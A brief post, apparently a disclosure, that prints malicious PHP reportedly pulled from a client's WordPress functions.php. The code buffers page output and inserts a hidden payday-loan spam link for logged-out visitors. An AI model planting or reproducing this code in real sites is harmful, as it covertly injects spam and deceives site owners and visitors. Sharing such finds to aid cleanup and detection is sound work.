Malicious code pulled from a client's WP functions.php

1. <?php function callbackx($buffer) {$tx="";if (function_exists("is_user_logged_in"))if (!is_user_logged_in()) $tx=" <style>.fcae{position:absolute;clip:rect(468px,auto,auto,424px);}</style><div class=fcae>quick <a href=http://advancedcashin10min.com >payday loans</a></div>"; if (stristr($buffer,"</a>"))$buffer=str_ireplace("</a>","</a>".$tx,$buffer); else $buffer=$tx.$buffer; return $buffer; } function buffer_startx(){ob_start("callbackx");}  function buffer_endx(){ob_end_flush();} add_action('wp_head', 'buffer_startx'); add_action('wp_footer', 'buffer_endx'); ?>